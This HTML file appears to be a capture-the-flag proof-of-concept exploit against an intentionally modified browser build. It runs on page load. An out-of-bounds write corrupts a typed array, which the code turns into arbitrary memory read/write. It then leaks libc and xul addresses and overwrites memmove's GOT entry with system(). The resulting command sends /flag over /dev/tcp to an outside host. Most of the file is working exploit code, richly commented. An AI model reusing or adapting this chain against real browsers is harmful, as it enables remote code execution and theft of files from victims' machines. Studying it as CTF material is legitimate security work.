<!DOCTYPE html>
<html>
<!-- flag{fire_just_makes_the_blaze_better} -->
<head>
<meta charset="utf-8">
<script src="utils.js"></script>
<title></title>
<script type="text/javascript">
/**
 * CTF proof-of-concept against a deliberately modified browser build.
 *
 * Depends on names this file does not define: `Array.prototype.blaze`
 * (not a standard method — presumably the challenge's intentionally added
 * primitive) and the `Int64` / `log` helpers, which utils.js (loaded in the
 * <head>) is expected to provide. Every variable below that is assigned
 * without var/let/const becomes an implicit global on window.
 *
 * Flow, as far as the body shows: a marker search across a typed array that
 * is indexed far past its 8 real elements, a read/write helper object built
 * on top of a second ArrayBuffer, a native-function address leak, and
 * finally a temporary GOT swap so that a copyWithin() call ends up in
 * system(). All address offsets are hard-coded for the challenge's exact
 * xul/libc builds; nothing here is portable, and a wrong step at any point
 * corrupts the process rather than failing cleanly.
 */
function exploit() {
  arr = [0x11223344];
  // 32 bytes = eight Uint32 slots. The scan loop further down indexes this
  // view up to 1000, which only makes sense if its length gets corrupted
  // first (hence the name).
  ab = new ArrayBuffer(32);
  overwrite_len = new Uint32Array(ab);
  overwrite_len[0] = 0x77777777;
  // Second buffer tagged with a recognisable marker so it can be located
  // through overwrite_len once bounds checks no longer hold.
  victim_ab = new ArrayBuffer(32);
  victim = new Uint32Array(victim_ab);
  victim[0] = 0x88888888;
  log("starting");
  // Non-standard method, assumed to be the challenge-provided bug. The
  // index-7 store on a length-1 array that follows is presumably the
  // out-of-bounds write that clobbers overwrite_len's length — TODO confirm
  // against the engine patch; it is not visible from this file.
  arr.blaze();
  arr[7] = 0x10000;
  // Look for victim's marker. Finding it means overwrite_len now reaches
  // victim_ab's memory; the marker is changed so a repeat scan cannot match
  // the same slot again. Note `==` here is a loose comparison on numbers.
  var ptr_overwrite_idx = -1;
  for (var i = 0; i < 1000; i++) {
    if (overwrite_len[i] == 0x88888888) {
      overwrite_len[i] = 0x98888888;
      ptr_overwrite_idx = i;
      break;
    }
  }
  log(`ptr_overwrite_idx ${ptr_overwrite_idx} `);
  // Marker not found: the heap did not come out as expected, so stop here
  // rather than write through stale indices.
  if (ptr_overwrite_idx == -1) {
    return;
  }
  // from https://github.com/phoenhex/files/blob/master/exploits/share-with-care/exploit.js
  // Read/write helpers. `prepare` stores `addr` in the two slots just
  // before the marker (indices -8 / -7), then hands back a fresh view over
  // victim_ab — judging by that, those slots presumably hold victim_ab's
  // data pointer, so the new view aliases `addr`. Each helper clobbers the
  // implicit globals `x` and `view`.
  memory = {
    prepare: function(addr, typed_array) {
      x = new Int64(addr);
      // Int64.rshift() comes from utils.js; its exact semantics are not
      // visible here.
      x.rshift();
      overwrite_len[ptr_overwrite_idx - 8] = x.lower();
      overwrite_len[ptr_overwrite_idx - 7] = x.upper();
      return new typed_array(victim_ab);
    },
    // Writes `data` as two 32-bit halves (little-endian order: low word first).
    write: function(addr, data) {
      view = memory.prepare(addr, Uint32Array);
      x = new Int64(data)
      view[0] = x.lower();
      view[1] = x.upper();
    },
    // Rebuilds a 64-bit value as a JS number: exact only below 2^53.
    read: function(addr) {
      view = memory.prepare(addr, Uint32Array);
      return new Int64(view[0] + 256 ** 4 * view[1]);
    },
    // Same as read() but keeps only the low 16 bits of the upper word, i.e.
    // the low 48 bits overall — presumably to strip a tag from the value.
    readWithTag: function(addr) {
      view = memory.prepare(addr, Uint32Array);
      return new Int64(view[0] + 256 ** 4 * (view[1] & 0xffff));
    }
  }
  // Attaches the native function (plus a marker) as properties on victim_ab,
  // then reads two pointers through the helpers. The indices -13 / -12 and
  // the `+ 5 * 8` step encode an engine-specific object layout that this
  // file does not document — TODO confirm which structures they refer to.
  // Returns the result as a plain number via Int64.toInt().
  function leak_native(nat_func) {
    victim_ab.yolo = nat_func;
    victim_ab.haha = 0x13391339;
    slots = overwrite_len[ptr_overwrite_idx - 13] * 2 ** 32 + overwrite_len[ptr_overwrite_idx - 12];
    slots_0 = (memory.readWithTag(slots).toInt());
    return memory.read(slots_0 + 5 * 8).toInt()
  }
  nat_func = leak_native(Date.now);
  log("[+] Date.now @ " + nat_func.toString(16) + "\n");
  // Build-specific constants: Date.now's distance from the xul base, two GOT
  // entries inside xul, dup's distance from the libc base, and system's
  // offset. Valid only for the challenge's binaries.
  xul_base = nat_func - 0x49c7ab0;
  memmove_got = xul_base + 0x0000818b220;
  dup_got = xul_base + 0x0000818b738;
  dup_libc = memory.read(dup_got);
  libc_base = dup_libc - 0xf7940;
  system_libc = libc_base + 0x45390;
  // `log`'s second argument is defined by utils.js, not here.
  log("[+] xul base @ " + xul_base.toString(16), true);
  log("[+] memmove@got @ " + memmove_got.toString(16), true);
  log("[+] libc_base@libc_@_" + libc_base.toString(16), true);
  log("[+] system@libc @ " + system_libc.toString(16), true);
  // NUL-terminated command string in a byte array. `my.host` is a
  // placeholder the author left in; the buffer is 100 bytes and the string
  // must stay shorter than that for the terminator write to be in range.
  var target = new Uint8Array(100);
  var cmd = "bash -ic 'cat /flag > /dev/tcp/my.host/12345' &";
  for (var i = 0; i < cmd.length; i++) {
    target[i] = cmd.charCodeAt(i);
  }
  target[cmd.length] = 0;
  // Temporarily point memmove's GOT entry at system(). copyWithin() on a
  // typed array presumably reaches memmove with target's data pointer as
  // its first argument, so the command string becomes system()'s argument;
  // the original entry is restored immediately after to keep the process
  // alive. This step only works because the GOT is writable at runtime —
  // a build linked with full RELRO (read-only GOT after relocation) would
  // not allow the swap.
  memmove_backup = memory.read(memmove_got);
  memory.write(memmove_got, system_libc);
  target.copyWithin(0, 1);
  memory.write(memmove_got, memmove_backup);
}
// Run immediately while the <script> element is being parsed; the return
// value is always undefined, so it is discarded explicitly.
void exploit();
</script>
</head>
<body>
</body>
</html>
<!-- 0x00007f9c4b7a6138│+0xc8: 0x00007f9c4b7a70a0 → 0x8899001177889900 -->